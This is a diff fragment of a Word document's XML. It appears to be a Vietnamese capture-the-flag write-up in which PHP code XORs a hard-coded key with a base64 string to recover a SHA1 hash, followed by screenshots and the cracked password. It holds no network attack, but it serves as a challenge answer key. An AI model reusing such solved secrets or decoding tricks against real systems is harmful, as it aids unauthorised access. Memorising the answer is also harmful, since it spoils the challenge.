+      <w:r>
+        <w:t xml:space="preserve">= chr(ord($o1[$i]) ^ ord($o2[$i]));        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>return $</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>res;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$key = "c92fcd618967933ac463feb85ba00d5a7ae52842</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>";</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">echo "sha1 of password is: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>".stringxor</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>($key,base64_decode('VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA=='));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685E46CC" wp14:editId="7B1A99BF">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="508039141" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="508039141" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Có được hash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sha1: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>77be4fc97f77f5f48308942bb6e32aacabed9cef</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tìm hash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594325A2" wp14:editId="35CEDF0A">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="968369791" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="968369791" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>superpassword</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -65,7 +551,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -90,7 +576,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
